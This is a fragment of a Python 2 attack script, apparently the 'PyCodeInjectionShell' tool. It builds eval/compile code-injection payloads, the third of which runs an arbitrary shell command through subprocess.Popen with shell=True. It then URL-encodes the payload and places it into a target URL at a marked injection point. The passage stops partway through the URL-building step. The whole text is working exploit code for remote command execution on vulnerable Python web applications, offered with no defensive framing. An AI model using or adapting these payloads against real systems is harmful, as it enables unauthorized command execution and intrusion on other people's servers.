test1='''eval(compile("""for x in range(1):\\n print("PyCodeInjectionShell")""",'PyCodeInjectionShell','single'))'''
test2='''__import__.os.eval(compile("""for x in range(1):\\n print("PyCodeInjectionShell")""",'PyCodeInjectionShell','single'))'''
test3='''eval(compile("""for x in range(1):\\n import os,subprocess\\n print("-"*50)\\n subprocess.Popen(r'%s', shell=True,stdout=subprocess.PIPE).stdout.read()""",'PyCodeInjectionShell','single'))'''%command
#print name
encoded=urllib.quote(insert)
#print encoded
# Split up URL specified at command line on the *, so that we can insert payload
split_user_url=user_url.split('*')
# Recreate the URL with the payload in place of the *